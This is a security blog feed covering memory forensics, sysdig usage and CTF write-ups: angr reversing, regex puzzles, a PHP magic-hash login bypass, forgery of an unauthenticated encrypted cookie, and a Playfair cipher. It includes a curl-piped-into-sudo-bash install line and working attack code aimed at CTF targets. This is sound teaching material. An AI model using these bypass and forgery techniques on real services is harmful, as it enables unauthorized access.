tag:blogger.com,1999:blog-77203152211031414742024-03-06T05:52:00.112+01:00hacktracking<pre># <code>cat blog >> /dev/brain 2> /proc/mind</code></pre>Unknownnoreply@blogger.comBlogger385125tag:blogger.com,1999:blog-7720315221103141474.post-65145208556110419822018-03-17T20:21:00.001+01:002018-03-17T20:30:08.967+01:00# Volatility timeline<br />
<pre>$ <code>volatility timeliner --output=body --output-file=timeliner.txt --profile=<profile> --filename=<ram_dump> && volatility mftparser --output=body --output-file=mftparser.txt --profile=<profile> --filename=<ram_dump> && volatility shellbags --output=body --output-file=shellbags.txt --profile=<profile> --filename=<ram_dump></code>
$ <code>cat timeliner.txt mftparser.txt shellbags.txt > timeline.txt</code>
$ <code>mactime -b timeline.txt -d > mactime.txt</code></pre>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-7720315221103141474.post-39213624317673562962017-12-05T20:58:00.000+01:002017-12-05T20:58:24.534+01:00# sysdig: System-level exploration tool<br />
<pre><comment>Installing (the script runs as root: download it and read it before piping it into sudo bash)</comment>
# <code>curl -s https://s3.amazonaws.com/download.draios.com/stable/install-sysdig | sudo bash</code>
<comment>Listing chisels</comment>
# <code>sysdig -cl</code>
<comment>Listing fields to filter</comment>
# <code>sysdig -l</code>
<comment>Using a chisel</comment>
# <code>sysdig -c topprocs_cpu</code>
<comment>Writing events to file</comment>
# <code>sysdig -z -w tracefile.scap.gz</code>
<comment>Reading events from a file and applying a chisel</comment>
# <code>sysdig -z -r tracefile.scap.gz -c topprocs_cpu</code>
<comment>Filtering events for a specific process</comment>
# <code>sysdig proc.name=sshd</code>
<comment>Filtering events for a specific file</comment>
# <code>sysdig fd.name=/var/log/auth.log</code>
<comment>Filtering events for files that contain /etc</comment>
# <code>sysdig fd.name contains /etc</code>
<comment>Filtering events whose arguments contain /bin/ls</comment>
# <code>sysdig evt.args contains /bin/ls</code>
<comment>Filtering by IP address (client or server side) and by transport protocol</comment>
# <code>sysdig fd.ip=1.2.3.4</code>
# <code>sysdig fd.l4proto=udp</code>
<comment>Formatting the output</comment>
# <code>sysdig -p '%evt.arg.path' 'evt.type=chdir and user.name=root'</code>
<comment>Information about all chisels</comment>
# <code>sysdig -cl | grep -P '^\w' | awk '{print $1}' | grep -v -e Category -e Use | xargs -L 1 sysdig -i</code>
<comment>Interesting chisels</comment>
# <code>sysdig -c topprocs_cpu</code>
# <code>sysdig -c echo_fds -s 2000 -A proc.name=httpd</code>
# <code>sysdig -c echo_fds -s 2000 -A fd.port=80 and evt.buffer contains GET</code>
# <code>sysdig -c spy_file 'RW /var/log/syslog'</code>
# <code>sysdig -c spy_logs</code>
# <code>sysdig -c spy_syslog</code>
# <code>sysdig -c spy_ip 1.2.3.4</code>
# <code>sysdig -c spy_port 443</code>
# <code>sysdig -c topconns</code>
# <code>sysdig -c topprocs_net</code>
# <code>sysdig -c spy_users 0|1</code>
# <code>sysdig -c lsof</code>
# <code>sysdig -c netstat</code>
# <code>sysdig -c ps</code>
# <code>sysdig -c topfiles_bytes proc.name contains tar</code>
# <code>sysdig -c list_login_shells ncat</code>
# <code>sysdig -c spy_users proc.loginshellid=1234</code>
# <code>sysdig -c stdin -c stdout proc.name=cat</code></pre><br />
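The one-liners above print events; turning them into something you can grep through or alert on means parsing sysdig's text output. The following is an added example (Python 3), not part of the original post: it reads lines in sysdig's default format (`%evt.num %evt.outputtime %evt.cpu %proc.name (%thread.tid) %evt.dir %evt.type %evt.info`) and lists, per process, every file opened under /etc together with the syscall outcome. The SAMPLE lines are constructed to look like that format and are not a real capture; the script name in the docstring is assumed.

```python
"""Post-process sysdig's text output into a per-process list of files opened
under /etc, with the syscall outcome. Added example in Python 3, not from the
original post. SAMPLE is constructed in sysdig's default line format
(%evt.num %evt.outputtime %evt.cpu %proc.name (%thread.tid) %evt.dir %evt.type %evt.info);
it is not a real capture. Feed it real output with (file name assumed):
    sysdig "evt.type in (open, openat) and evt.dir = <" | python3 etc_opens.py
"""
import re
import sys
from collections import defaultdict

SAMPLE = """\
101 12:00:01.000000001 0 sshd (2001) > openat dirfd=-100(AT_FDCWD) name=/etc/ssh/sshd_config flags=1(O_RDONLY) mode=0
102 12:00:01.000000200 0 sshd (2001) < openat fd=5(<f>/etc/ssh/sshd_config) dirfd=-100(AT_FDCWD) name=/etc/ssh/sshd_config flags=1(O_RDONLY) mode=0 dev=801
103 12:00:02.000000001 1 bash (3001) > openat dirfd=-100(AT_FDCWD) name=/etc/shadow flags=1(O_RDONLY) mode=0
104 12:00:02.000000300 1 bash (3001) < openat fd=-13(EACCES) dirfd=-100(AT_FDCWD) name=/etc/shadow flags=1(O_RDONLY) mode=0 dev=0
105 12:00:03.000000001 1 vi (3002) > openat dirfd=-100(AT_FDCWD) name=/etc/passwd flags=6(O_RDWR|O_CREAT) mode=0644
106 12:00:03.000000400 1 vi (3002) < openat fd=3(<f>/etc/passwd) dirfd=-100(AT_FDCWD) name=/etc/passwd flags=6(O_RDWR|O_CREAT) mode=0644 dev=801
107 12:00:04.000000001 0 bash (3001) < read fd=0(<f>/dev/pts/0) size=1
"""

LINE_RE = re.compile(
    r"^(?P<num>\d+) (?P<time>\S+) (?P<cpu>\d+) (?P<proc>\S+) \((?P<tid>\d+)\) "
    r"(?P<dir>[<>]) (?P<type>\w+) ?(?P<info>.*)$")

def parse_event(line):
    """Split one sysdig line into its fixed columns plus a dict of key=value args."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ev = m.groupdict()
    ev["args"] = dict(re.findall(r"(\w+)=(\S+)", ev["info"]))
    return ev

def etc_opens(text):
    """{proc: [(path, outcome)]} for open/openat exit events under /etc.
    outcome is 'ok' or the errno name sysdig prints in a negative fd, e.g. EACCES."""
    result = defaultdict(list)
    for line in text.splitlines():
        ev = parse_event(line)
        if not ev or ev["dir"] != "<" or ev["type"] not in ("open", "openat"):
            continue
        path = ev["args"].get("name", "")
        if not path.startswith("/etc/"):
            continue
        err = re.match(r"-\d+\((\w+)\)", ev["args"].get("fd", ""))
        result[ev["proc"]].append((path, err.group(1) if err else "ok"))
    return dict(result)

if __name__ == "__main__":
    text = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE
    for proc, opens in etc_opens(text).items():
        for path, outcome in opens:
            print(f"{proc:10} {outcome:8} {path}")
```

Only exit events (`evt.dir = <`) carry the result, which is why the enter lines are skipped; a failed open shows up as a negative fd with the errno name in parentheses, which is exactly the bash-reading-/etc/shadow case you want to see.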
<u>Reference</u><br />
<br />
https://github.com/draios/sysdig/wikiUnknownnoreply@blogger.com0tag:blogger.com,1999:blog-7720315221103141474.post-10440458722545942742017-12-05T10:57:00.000+01:002017-12-05T10:57:38.460+01:00# SimpleHTTPSServer with letsencrypt certificate<br />
<pre># <code>apt-get update</code>
# <code>apt-get install software-properties-common</code>
# <code>add-apt-repository ppa:certbot/certbot</code>
# <code>apt-get update</code>
# <code>mkdir webserver</code>
# <code>cd webserver</code>
# <code>apt-get install certbot</code>
# <code>mkdir www</code>
# <code>certbot certonly --webroot -w $PWD/www -d mydomain.org -d www.mydomain.org</code>
# <code>cp /etc/letsencrypt/live/mydomain.org/privkey.pem .</code>
# <code>cp /etc/letsencrypt/live/mydomain.org/fullchain.pem .</code>
# <code>cat privkey.pem fullchain.pem > cert.pem</code>
# <code>cat https-server.py</code>
<output>import BaseHTTPServer, SimpleHTTPServer
import os
import ssl
import sys
port = 443
iface = sys.argv[1]
# Bind to the first IPv4 address of the interface given on the command line.
ipv4 = os.popen('ip addr show ' + iface).read().split('inet ')[1].split('/')[0]
cwd = os.getcwd()
# cert.pem = privkey.pem + fullchain.pem, so it contains the private key:
# keep it here, outside www/, since everything under www/ is served to anyone.
certfile = cwd + '/cert.pem'
wwwdir = cwd + '/www'
os.chdir(wwwdir)
httpd = BaseHTTPServer.HTTPServer((ipv4, port), SimpleHTTPServer.SimpleHTTPRequestHandler)
# ssl.wrap_socket without ssl_version/ciphers takes whatever the OpenSSL build
# allows, old TLS versions included: fine for a quick file drop, not for
# anything that stays up.
httpd.socket = ssl.wrap_socket (httpd.socket, certfile = certfile, server_side = True)
httpd.serve_forever()</output>
# <code>python https-server.py eth0</code></pre>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-7720315221103141474.post-45813546551269862412017-11-11T22:31:00.000+01:002017-11-11T22:31:05.279+01:00# HITCON CTF 2017 Quals: Sakura - Reversing<br />
<pre># <code>cat sakura.py</code>
<output>import IPython
import angr
import json
import logging
import r2pipe
from subprocess import Popen, PIPE   # used in the IPython session below
#angr.manager.l.setLevel(logging.DEBUG)
fn = './sakura-fdb3c896d8a3029f40a38150b2e30a79'
base = 0x400000
toFind = base + 0x110ca
toAvoid = []
# Collect the address of every "mov byte [rbp - 0x1e49], 0" with radare2 and
# hand them to angr as states to avoid.
r2 = r2pipe.open(filename = fn)
# mov byte [rbp - 0x1e49], 0 == \xc6\x85\xb7\xe1\xff\xff\x00
r2output = json.loads(r2.cmd('/j \\xc6\\x85\\xb7\\xe1\\xff\\xff\\x00'))
for e in r2output:
    toAvoid.append(base + int(e['offset']))
#userInputBuffer = base + 0x2121e0
#afterUserInput = base + 0x110ba
#state = p.factory.blank_state(addr = afterUserInput)
#state.memory.store(userInputBuffer, state.se.BVS('userinput', 400 * 8))
#for i in range(400):
#    state.mem[userinput + i].char = state.se.BVS('x' + str(i), 8)
p = angr.Project(fn)
print p.arch
print p.entry
print p.filename
p.factory.block(toFind).pp()
print
state = p.factory.entry_state()
sm = p.factory.simgr(state)
sm.explore(find = toFind, avoid = toAvoid)
found = sm.found[0]
dump = found.posix.dumps(0)   # the stdin that reaches toFind
print repr(dump)
IPython.embed()</output>
# <code>python sakura.py</code>
<output><Arch AMD64 (LE)>
4196128
sakura-fdb3c896d8a3029f40a38150b2e30a79
0x4110ca: lea rdi, qword ptr [rip + 0x2f9]
0x4110d1: mov eax, 0
0x4110d6: call 0x4006e0
'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0092\x00\x00\x00\x0041\x00\x00\x00\x0091\x0017\x00378192\x00\x00638\x004683\x0029618\x00\x0081\x0071\x009837\x00\x00\x00\x0089\x0092\x00\x00\x00\x00936\x00915\x00\x00\x00\x00\x0081\x0012\x00\x00\x008216\x002843\x00\x00\x00\x0031\x0012\x00\x00\x00\x00498\x00931\x0037\x00\x0029341\x00\x00\x003792\x0062\x00192837\x0012\x007128\x00172\x00\x00\x00\x0019\x00\x00\x00\x00\x00\x0092\x00\x00\x00\x0091\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0014\x0065\x00\x00\x00271\x0049\x00\x00\x00\x0041835792\x00\x0089641275\x00125\x0013\x0073\x0091\x00\x0053\x0037\x0076\x0072\x0086\x00\x0086\x00\x00\x0026\x00\x00\x00\x00948\x00512\x00\x00\x0053\x00\x00\x0036\x00\x00\x0057\x0018\x0086\x00\x00\x0052\x00\x00\x0051\x0048\x0049\x00538\x0085\x0069\x00\x0085\x0017863294\x00\x0073615284\x00\x00\x0031\x0074\x00\x00\x00\x00\x00\x0035\x00123\x00'</output>
In [1]: <code>sakura = Popen([fn], stdin = PIPE, stdout = PIPE)</code>
In [2]: <code>flag = sakura.communicate(input = dump)[0]</code>
In [3]: <code>print flag</code>
<output>Out [3]: hitcon{6c0d62189adfd27a12289890d5b89c0dc8098bc976ecc3f6d61ec0429cccae61}</output></pre>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-7720315221103141474.post-56060515981732000412017-10-22T19:53:00.000+02:002017-10-22T19:53:36.452+02:00# Pwn2Win 2k17: Baby Regex - Misc<br />
<pre># <code>cat regexbaby_034fa13e17660024b26b6f570aa6b66bba446e2f837c052f012225190387bafa.txt</code>
<output>Open your eyes is all that is needing. The heart lies and the head plays tricks with us, but the eyes see true. Look with your eyes. Hear with your ears. Taste with your mouth. Smell with your nose. Feel with your skin. Then comes the thinking, afterward, and in that way <knowing the truth.
>
Open way to combat the horizon effect is to continue search when an otherwise terminal situation is judged to be particularly dynamic. Such heuristic continuation is sometimes called feedover.
The mind which is created quick to love, is responsive to everything that is pleasing, soon as by pleasure it is awakened into activity. Your apprehensive faculty draws an impression from a real object, and unfolds it within you, so that it makes the mind turn thereto. And if, being turned, it inclines towards it, that inclination is love, for don't say blabla; that is nature, which through pleasure is bound anew within you.
Tune up your circuits, check out your Chips
Because you're going to live a Long Life.
Check the identity card, it shows your code.
Listen to the white noise in your ears - it Fades AWAY.
Watching the sunset on the end of the HIGHWAY ---
City meditation in curving reflections of NEON signs on the Chrome of the Cars.
The WeT Concrete and mirrored Streets recall shows the traffic away,
recalls you to the smell of scratching cloudy sheets.
Billboards and Cholo-Ads above are the unfocused bottle of Time.
Drink it away, FLY to the ORBITAL Fly.
Away to drivin' the ocean of blue-green.
Drivin' away to the ocean of green-blue.</output></pre><pre># <code>ipython</code>
> <code>import re</code>
> <code>data = open('regexbaby_034fa13e17660024b26b6f570aa6b66bba446e2f837c052f012225190387bafa.txt').read()</code>
> <code>def check(regex):</code>
...     <code>print len(regex)</code>
...     <code>print re.findall(regex, data)</code>
# "from "Drivin" until the end of phrase, without using any letter, single quotes or wildcards, and capturing "Drivin'" in a group, and "blue." in another", with max. "16" chars:
> <code>check('(.{7}).+-(.{5})$')</code>
<output>16
[("Drivin'", 'blue.')]</output>
# "(BONUS) What's the name of the big american television channel (current days) that matchs with this regex: .(.)\1", with max. "x" chars:
# "FLY until... Fly", without wildcards or the word "fly" and using backreference", with max. "14" chars:
# "<knowing the truth. >, without using "line break"", with max. "8" chars:
> <code>check('<[^>]+>')</code>
<output>7
['<knowing the truth. \n>']</output>
# "All "Open's", without using that word or [Ope-], and no more than one point", with max. "11" chars:
> <code>check('(?i)(oPEn)')</code>
<output>10
['Open', 'Open']</output>
# "the follow words: "unfolds", "within" (just one time), "makes", "inclines" and "shows" (just one time), without using hyphen, a sequence of letters (two or more) or the words itself", with max. "38" chars:
> <code>check('(?:\s\S{2}d|t)\s([^F]\w{3,7}[n!s])\s')</code>
<output>36
['unfolds', 'within', 'makes', 'inclines', 'shows']</output>
# "Chips" and "code.", and it is only allowed the letter "c" (insensitive)", with max. "15" chars:
> <code>check(' .{32} (.{5})\n')</code>
<output>14
['Chips', 'code.']</output>
# Type the regex that capture: "the only word that repeat itself in the same word, using a group called "a" (and use it!), and the group expression must have a maximum of 3 chars, without using wildcards, plus signal, the word itself or letters different than [Pa]", with max. "16" chars:
> <code>check('(?P<a>..a)(?P=a)')</code>
<output>16
['bla']</output></pre><pre># <code>cat baby_regex.py</code>
<output>from pwn import *
qa = {
    'BONUS': 'cnn',
    'knowing the truth': '<[^>]+>',
    'FLY': '(?i)(F.y).+\\1',
    '[Pa]': '(?P<a>..a)(?P=a)',
    '[Ope-]': '(?i)(oPEn)',
    'Drivin': '(.{7}).+-(.{5})$',
    'unfolds': '(?:\s\S{2}d|t)\s([^F]\w{3,7}[n!s])\s',
    'Chips': ' .{32} (.{5})\\n'
}
nqa = len(qa)
host = '200.136.213.148'
port = 5000
correct = 0
while True:
    r = remote(host, port)
    while True:
        q = r.read(1024)
        print q
        if 'CTF-BR' in q: sys.exit(0)
        for k in qa:
            if k in q:
                a = qa[k]
                print 'Sending... ' + a
                r.sendline(a)
                resp = r.readline()
                if 'Nice, next...' in resp:
                    correct += 1
                    print '[*] OK!', correct
                print
                break
    r.close()</output>
# <code>python baby_regex.py</code>
<output>Type the regex that capture: "Chips" and "code.", and it is only allowed the letter "c" (insensitive)", with max. "15" chars:
Sending... .{32} (.{5})\n
[*] OK! 1
Type the regex that capture: "<knowing the truth. >, without using "line break"", with max. "8" chars:
Sending... <[^>]+>
[*] OK! 2
Type the regex that capture: "the only word that repeat itself in the same word, using a group called "a" (and use it!), and the group expression must have a maximum of 3 chars, without using wildcards, plus signal, the word itself or letters different than [Pa]", with max. "16" chars:
Sending... (?P<a>..a)(?P=a)
[*] OK! 3
Type the regex that capture: "All "Open's", without using that word or [Ope-], and no more than one point", with max. "11" chars:
Sending... (?i)(oPEn)
[*] OK! 4
Type the regex that capture: "(BONUS) What's the name of the big american television channel (current days) that matchs with this regex: .(.)\1", with max. "x" chars:
Sending... cnn
[*] OK! 5
Type the regex that capture: "from "Drivin" until the end of phrase, without using any letter, single quotes or wildcards, and capturing "Drivin'" in a group, and "blue." in another", with max. "16" chars:
Sending... (.{7}).+-(.{5})$
[*] OK! 6
Type the regex that capture: "the follow words: "unfolds", "within" (just one time), "makes", "inclines" and "shows" (just one time), without using hyphen, a sequence of letters (two or more) or the words itself", with max. "38" chars:
Sending... (?:\s\S{2}d|t)\s([^F]\w{3,7}[n!s])\s
[*] OK! 7
Type the regex that capture: "FLY until... Fly", without wildcards or the word "fly" and using backreference", with max. "14" chars:
Sending... (?i)(F.y).+\1
[*] OK! 8
CTF-BR{Counterintelligence_wants_you!}</output></pre><br />
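The solver above just replays answers; what the server actually does is run each regex against the text and enforce the side conditions of every prompt. The block below is an added example (Python 3), not the post's code: an offline checker with the challenge text embedded and the constraints encoded the way I read them from the prompts (maximum length, forbidden characters or words, required named group). The organisers' checker is not public, so RULES is an approximation. The space after "truth." is kept because the `'<knowing the truth. \n>'` capture above proves it is there; the "Chips" answer is left out because its ` .{32} (.{5})\n` match depends on trailing spaces that the listing does not preserve.

```python
"""Offline checker for the Baby Regex answers. Added example (Python 3), not
the post's solver. LINES is the challenge file as listed above (the space
after "truth." is real); RULES is my reading of each prompt's constraints."""
import re

LINES = [
    "Open your eyes is all that is needing. The heart lies and the head plays tricks with us, but the eyes see true. Look with your eyes. Hear with your ears. Taste with your mouth. Smell with your nose. Feel with your skin. Then comes the thinking, afterward, and in that way <knowing the truth. ",
    ">",
    "Open way to combat the horizon effect is to continue search when an otherwise terminal situation is judged to be particularly dynamic. Such heuristic continuation is sometimes called feedover.",
    "The mind which is created quick to love, is responsive to everything that is pleasing, soon as by pleasure it is awakened into activity. Your apprehensive faculty draws an impression from a real object, and unfolds it within you, so that it makes the mind turn thereto. And if, being turned, it inclines towards it, that inclination is love, for don't say blabla; that is nature, which through pleasure is bound anew within you.",
    "Tune up your circuits, check out your Chips",
    "Because you're going to live a Long Life.",
    "Check the identity card, it shows your code.",
    "Listen to the white noise in your ears - it Fades AWAY.",
    "Watching the sunset on the end of the HIGHWAY ---",
    "City meditation in curving reflections of NEON signs on the Chrome of the Cars.",
    "The WeT Concrete and mirrored Streets recall shows the traffic away,",
    "recalls you to the smell of scratching cloudy sheets.",
    "Billboards and Cholo-Ads above are the unfocused bottle of Time.",
    "Drink it away, FLY to the ORBITAL Fly.",
    "Away to drivin' the ocean of blue-green.",
    "Drivin' away to the ocean of green-blue.",
]
TEXT = "\n".join(LINES) + "\n"

ANSWERS = {
    "Drivin": r"(.{7}).+-(.{5})$",
    "knowing the truth": r"<[^>]+>",
    "[Ope-]": r"(?i)(oPEn)",
    "unfolds": r"(?:\s\S{2}d|t)\s([^F]\w{3,7}[n!s])\s",
    "[Pa]": r"(?P<a>..a)(?P=a)",
    "FLY": r"(?i)(F.y).+\1",
}

# key -> (max length, regex that must NOT match the answer, required substring)
RULES = {
    "Drivin": (16, r"[A-Za-z']", None),                 # no letters, no single quotes
    "knowing the truth": (8, r"\\n|\n", None),          # no line break, literal or real
    "[Ope-]": (11, r"Open|[Ope-]", None),               # not the word, none of O p e -
    "unfolds": (38, r"-|[A-Za-z]{2}|unfolds|within|makes|inclines|shows", None),
    "[Pa]": (16, r"\+|bla|[A-OQ-Zb-z]", "(?P<a>"),      # only P and a as letters, group a
    "FLY": (14, r"(?i:fly)|\*", None),                  # not the word fly, no * wildcard
}

def check_answer(key, regex):
    """Return (problems, captures); problems is empty when regex respects RULES."""
    max_len, forbidden, required = RULES[key]
    problems = []
    if len(regex) > max_len:
        problems.append(f"{len(regex)} chars, limit {max_len}")
    if forbidden and re.search(forbidden, regex):
        problems.append(f"matches forbidden pattern {forbidden!r}")
    if required and required not in regex:
        problems.append(f"missing {required!r}")
    return problems, re.findall(regex, TEXT)

def check_all(answers=ANSWERS):
    return {key: check_answer(key, regex) for key, regex in answers.items()}

if __name__ == "__main__":
    for key, (problems, captures) in check_all().items():
        print(key, "OK" if not problems else problems, captures)
```

The interesting part of the puzzle is visible in RULES: each prompt forbids the obvious way of writing the regex, so the answers lean on `(?i)` to dodge a case-sensitive character ban, on `\S{2}d` to say "and" without two consecutive letters, and on a backreference to say "Fly" without the word.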
<u>References</u><br />
<br />
https://www.regexpal.com<br />
https://www.debuggex.comUnknownnoreply@blogger.com0tag:blogger.com,1999:blog-7720315221103141474.post-10379544794708637062017-10-15T23:39:00.000+02:002018-03-17T20:30:39.325+01:00# GynvaelEN mission 018<br />
<pre># <code>curl 'http://gynvael.coldwind.pl/c3459750a432b7449b5619e967e4b82d90cfc971_mission018/admin.php?password1=240610708&password2=10932435112'</code>
<output>Welcome back dear admin.
Your flag: I'm not sure this is how equality is supposed to work.
Now try with <a href='superadmin.php'>superadmin.php</a>!</output></pre><pre># <code>curl 'http://gynvael.coldwind.pl/c3459750a432b7449b5619e967e4b82d90cfc971_mission018/superadmin.php'</code>
<output>...
if (hash("sha256", $_GET['password']) ==
'0e12345678901234567890123456789012345678901234567890123456789012')
...</output>
<code>_:)</code></pre><br />
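What admin.php fell for, and what superadmin.php is asking for, as an added example (Python 3) that is not part of the original post: PHP's loose `==` compares two strings numerically when both look numeric, and a hex digest of the form `0e` followed only by decimal digits is the numeric string 0 * 10^N, i.e. 0. Two different inputs with such "magic" digests therefore compare equal. The brute-force helper makes the cost visible: for MD5 the odds are roughly 1 in 3e8 per try, for SHA-256 the extra 32 hex digits push that to about 1 in 1e15, which is why the post stops at `_:)`.

```python
"""PHP loose comparison and magic hashes. Added example (Python 3), not from
the post. Models string == string in PHP (numeric strings compare as numbers)
and searches for inputs whose digest has the 0e<digits> shape."""
import hashlib
import itertools
import re
import string

MAGIC = re.compile(r"^0e[0-9]+$")
# PHP's idea of a numeric string: optional whitespace and sign, digits with an
# optional fraction, optional exponent. Hex like 0x1A is not numeric in PHP 7+.
PHP_NUMERIC = re.compile(r"^\s*[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?\s*$")

def digest(algo, s):
    return hashlib.new(algo, s.encode()).hexdigest()

def is_magic(hexdigest):
    """True if PHP would read the digest as the number 0 (0 * 10**N)."""
    return MAGIC.match(hexdigest) is not None

def php_loose_eq(a, b):
    """'a' == 'b' for two PHP strings: both numeric -> compared as numbers."""
    if PHP_NUMERIC.match(a) and PHP_NUMERIC.match(b):
        return float(a) == float(b)
    return a == b

def loose_equal_digests(algo, p1, p2):
    """The admin.php situation: two different passwords whose digests differ
    but satisfy digest(p1) == digest(p2) under PHP's loose comparison."""
    h1, h2 = digest(algo, p1), digest(algo, p2)
    return h1, h2, php_loose_eq(h1, h2) and p1 != p2

def find_magic(algo, alphabet=string.digits, max_len=8, limit=10**6):
    """Brute force, shortest first: (string, digest) with a magic digest, or
    None after `limit` attempts. P(hit) per try is 1/256 for the leading 0e
    times (10/16)**(hexlen-2) for all-decimal remaining digits: ~3e-9 for MD5,
    ~1e-15 for SHA-256."""
    tries = 0
    for n in range(1, max_len + 1):
        for chars in itertools.product(alphabet, repeat=n):
            if tries >= limit:
                return None
            tries += 1
            s = "".join(chars)
            h = digest(algo, s)
            if is_magic(h):
                return s, h
    return None

if __name__ == "__main__":
    # the canonical MD5 pair, and the pair the post sent to admin.php
    for p1, p2 in (("240610708", "QNKCDZO"), ("240610708", "10932435112")):
        print(p1, p2, loose_equal_digests("md5", p1, p2))
    print("sha256 magic after 1e6 digit strings:", find_magic("sha256", limit=10**6))
```

The fix on the PHP side is `===` (or `hash_equals()`), which compares the strings as strings; the flag text is the hint.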
<u>Source</u><br />
<br />
https://www.youtube.com/watch?v=adHOlKKbFXM (2:00:22)<br />
<br />
<u>References</u><br />
<br />
https://www.whitehatsec.com/blog/magic-hashes/Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-7720315221103141474.post-82058285628504145702017-10-15T21:53:00.000+02:002017-10-15T21:53:46.577+02:00# GynvaelEN mission 017<br />
<pre>zeros = '\x00'*32
base64.b64encode(zeros)
'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA='
Cookie: mission017session=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
ivencrypted.encode('hex') = '927a00302d2e13896de885ece9f3445d2de83b880d2043a6ecc6e8bbb0a831dc'
result = ''
new = '{"access_level":"admin"}'
for i in range(len(new)):
    result += chr(ord(new[i]) ^ ord(ivencrypted[i]))
base64.b64encode(result) == 6VhhU05LYPoyhOCajJ9mZw+JX+VkTmHb
Cookie: mission017session=6VhhU05LYPoyhOCajJ9mZw%2BJX%2BVkTmHb
Decrypted cookie data: {"access_level":"admin"}
Flag: HMAC? What do you mean "HMAC"?</pre><br />
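The same attack run offline, as an added example (Python 3) that is not the post's code. The mission's real cipher and key are unknown, so a toy CTR-style keystream (SHA-256 over key, IV and counter) with a fixed IV stands in for whatever the server used; that substitution is an assumption and the only property being demonstrated is the one exploited above: decryption is an XOR with a keystream, an all-zero cookie makes the server echo that keystream, and nothing authenticates the cookie. The second half adds the HMAC the flag text hints at.

```python
"""Keystream recovery and cookie forgery, then the encrypt-then-MAC fix.
Added example (Python 3), not from the post. KEY, MAC_KEY and the SHA-256
based keystream are assumptions standing in for the mission's cipher."""
import base64
import hashlib
import hmac
import json

KEY = b"server-key-known-only-to-the-server"   # assumption
MAC_KEY = b"server-mac-key"                     # assumption
STATIC_IV = bytes(16)                           # reused IV: the actual weakness

def keystream(n, iv=STATIC_IV):
    """Toy CTR-like keystream: same key + same IV => same bytes every time."""
    out = b""
    counter = 0
    while len(out) < n:
        out += hashlib.sha256(KEY + iv + counter.to_bytes(4, "big")).digest()
        counter += 1
    return out[:n]

def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

# --- vulnerable service: decrypts and echoes, no integrity check ---
def server_decrypt(cookie_b64):
    data = base64.b64decode(cookie_b64)
    return xor(data, keystream(len(data)))

def server_is_admin(cookie_b64):
    try:
        return json.loads(server_decrypt(cookie_b64))["access_level"] == "admin"
    except (ValueError, KeyError, TypeError):
        return False

# --- attacker: an all-zero cookie decrypts to the keystream itself ---
def forge(target=b'{"access_level":"admin"}'):
    probe = base64.b64encode(bytes(32)).decode()
    ks = server_decrypt(probe)                  # == keystream(32)
    return base64.b64encode(xor(target, ks[:len(target)])).decode()

# --- fixed service: encrypt-then-MAC, constant-time tag check ---
def server_issue(plaintext):
    ct = xor(plaintext, keystream(len(plaintext)))
    tag = hmac.new(MAC_KEY, ct, hashlib.sha256).digest()
    return base64.b64encode(ct + tag).decode()

def server_accepts(cookie_b64):
    data = base64.b64decode(cookie_b64)
    if len(data) < 32:
        return False
    ct, tag = data[:-32], data[-32:]
    expected = hmac.new(MAC_KEY, ct, hashlib.sha256).digest()
    return hmac.compare_digest(expected, tag)

if __name__ == "__main__":
    cookie = forge()
    print("forged cookie:", cookie)
    print("server decrypts it to:", server_decrypt(cookie))
    print("admin without HMAC:", server_is_admin(cookie))
    print("accepted with HMAC:", server_accepts(cookie))
```

With a fresh random IV per cookie the zero-probe would only reveal the keystream of that one cookie, but the forgery would still work on any cookie you are allowed to decrypt; the MAC is what actually closes it.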
<u>Source</u><br />
<br />
https://www.youtube.com/watch?v=9xGgZUMNl2Y (2:05:00)<br />
<br />
<u>References</u><br />
<br />
https://en.wikipedia.org/wiki/Block_cipher_mode_of_operationUnknownnoreply@blogger.com0tag:blogger.com,1999:blog-7720315221103141474.post-66403473842277278152017-10-15T20:44:00.000+02:002017-10-15T20:44:26.450+02:00# GynvaelEN mission 016<br />
<u>Wav to image using RX-SSTV</u><br />
<br />
Slow-scan TV (SSTV) transmits a still image over a voice-bandwidth radio channel: each scan line becomes an audio tone whose frequency follows the pixel brightness, which is why RX-SSTV can rebuild the picture from the .wav.<br />
The picture shows a 5x5 letter square, only partly readable, followed by a ciphertext in letter pairs, i.e. a Playfair key square and message:<br />
<br />
<pre>? ? R O N
D I Y M A
U Z ? ? ?
B C K P ?
? ? V W X
Y DHXDMW BQLF KDYNV</pre><br />
<u>Manual decryption</u><br />
<br />
<pre>Y D = I A
HX = ??
DM = AY
W B = ? P
QL = ??
F K = ? ?
DY = AI
NV = RX
I A??AY? P??? ?AIRX ---> I ALWAYS PLAY FAIRX (the trailing X is Playfair padding)</pre><br />
<u>Source</u><br />
<br />
https://www.youtube.com/watch?v=locDS3uHv_E (2:03:00)<br />
<br />
<u>References</u><br />
<br />
https://en.wikipedia.org/wiki/Slow-scan_televisionUnknownnoreply@blogger.com0tag:blogger.com,1999:blog-7720315221103141474.post-35049875490426229272017-09-30T00:00:00.000+02:002017-09-30T00:00:27.061+02:00# EkoParty CTF 2017: OnTheWire (300) - Misc<br />
<br />
<u>Introduction</u><br />
<br />
We have sniffed some bytes of a transmission. What does it say?<br />
51 91 51 31 51 71 112 31 51 123 91 71 95 127 121 51 112 95 121 121 91 71 112 126 112 112 95 79 121 121 95 51 91 71 112 123 121 126 112 91 112 109 91 71 95 51 121 48 112 121 112 126 95 78 121 51 112 123 112 61<br />
<br />
<u>Hint</u>
You will see the flag in a lcd display<br />
<br />
<u>Solution</u><br />
<br />
<pre># <code>cat onthewire.py</code>
